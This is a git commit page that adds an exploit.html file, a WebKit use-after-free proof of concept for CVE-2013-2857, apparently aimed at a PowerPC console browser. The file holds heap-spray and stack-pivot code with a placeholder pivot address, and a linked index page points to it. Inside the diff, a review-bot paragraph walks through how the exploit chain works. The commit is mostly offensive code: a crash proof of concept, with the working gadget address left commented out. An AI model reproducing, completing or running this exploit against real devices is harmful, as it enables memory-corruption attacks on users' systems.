
Initial commit

pull/1/head
Winbagility 2 years ago
commit
6e6d575e06
5 changed files with 75 additions and 0 deletions
  1. BIN
      diibugger.mp4
  2. +64
    -0
      exploit.html
  3. BIN
      illuminati.mp4
  4. +11
    -0
      index.html
  5. BIN
      tcpgecko.mp4

BIN
diibugger.mp4 View File


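--- a/exploit.html
+++ b/exploit.html
@@ -0,0 +1,64 @@
+<!--
+Tested on 5.5.1
+CVE-2013-2857
+Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
+Result: Bug is present, crash on what is presumably render
+-->
+<script>
+function UaF(a)
+{
+var pivotAdressAdress = 0x1B000000; //r6
+var pivotAdress = 0x41414140; //0x0101cd80; //mr r1,r11; blr
+var sizeWebCoreImageLoader = 0x18;
+var sprayCount = 2000;
+var _4K = 0x1000;
+//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
+a.type="radio";
+//Allocate this new WebCore::ImageLoader over freed WebCore::
+var ab = new ArrayBuffer(sizeWebCoreImageLoader);
+var dv = new DataView(ab)
+
+/*
+0:000:x86> dt webkit!WebCore::ImageLoader
++0x000 __VFN_table : Ptr32
++0x004 m_client : Ptr32 WebCore::ImageLoaderClient
++0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>
++0x00c m_failedLoadURL : WTF::AtomicString
++0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
++0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
++0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
++0x010 m_imageComplete : Pos 3, 1 Bit
++0x010 m_loadManually : Pos 4, 1 Bit
++0x010 m_elementIsProtected : Pos 5, 1 Bit
+*/
+//Register:r3 Adress:0x1AF35330-0x1AF35360
+dv.setUint32(0x00, 0x41414141); //vtable
+dv.setUint32(0x04, pivotAdressAdress); //m_client
+dv.setUint32(0x08, 0x00000000); //m_image, must be NULL
+dv.setUint32(0x0C, 0x42424242); //m_failedLoadURL
+dv.setUint32(0x10, 0x43434343); //m_hasPendingBeforeLoadEvent
+dv.setUint32(0x14, 0x44444444); //padding
+//Spray large ArrayBuffer with pivotAdress
+//Middle range 0x1B000000
+var ar = new Array(sprayCount);
+for(var i=0; i<sprayCount; i++){
+ar[i] = new DataView(new ArrayBuffer(_4K));
+for(var j=0; j<_4K; j+=4){
+ar[i].setUint32(j, 0x99999999); //filler
+}
+ar[i].setUint32(0x24, pivotAdressAdress); //lwz r31, 0x24(r6)
+//...
+ar[i].setUint32(0x00, pivotAdressAdress); //lwz r7, 0x0(r31)
+ar[i].setUint32(0xEC, pivotAdress); //lwz r9, 0xEC(r7)
+}
+//Use the new WebCore::ImageLoader & pivot !
+return 0;
+}
+</script>
+
+<input id="x" type="image" onerror="UaF(this);" src=""/>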
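Review bot: The 0x18-byte `ab` buffer that is supposed to reoccupy the ImageLoader freed by `a.type="radio"` is never checked for actually landing in the freed slot, and `UaF` returns 0 straight after the spray under the "Use the new WebCore::ImageLoader & pivot !" comment, so nothing in the function performs the use; the header only says the crash is "presumably render". A comment at that point would spare the next reader a hunt for the trigger, e.g. `// No explicit trigger here: the dangling ImageLoader is dereferenced later (apparently during render), which is when the fake m_client -> 0x24 -> 0x00 -> 0xEC chain is walked.` The spray's `setUint32` calls rely on DataView's big-endian default to match the PowerPC `lwz` loads, which deserves `// DataView defaults to big-endian, matching the PPC target` because a little-endian port would silently break the chain. The struct layout quoted in the block comment is a windbg dump of an x86 WebKit (`0:000:x86>`), so the field offsets used for the 5.5.1 PPC build are inferred rather than observed, and whether 0x1B000000 falls on a 4K-aligned buffer inside the 2000-page spray is likewise assumed; both would be worth hedging in the comments. Note also that `pivotAdress` is the placeholder 0x41414140 with the real gadget 0x0101cd80 commented out, so as committed this is a crash PoC, not a working pivot.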
BIN
illuminati.mp4 View File


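--- a/index.html
+++ b/index.html
@@ -0,0 +1,11 @@
+
+<center>
+<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
+<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
+<a href="exploit.html"><h1>Exploit</h1></a><br/>
+<br/>
+<br/>
+<br/>
+<br/>
+<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
+</center>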
BIN
tcpgecko.mp4 View File

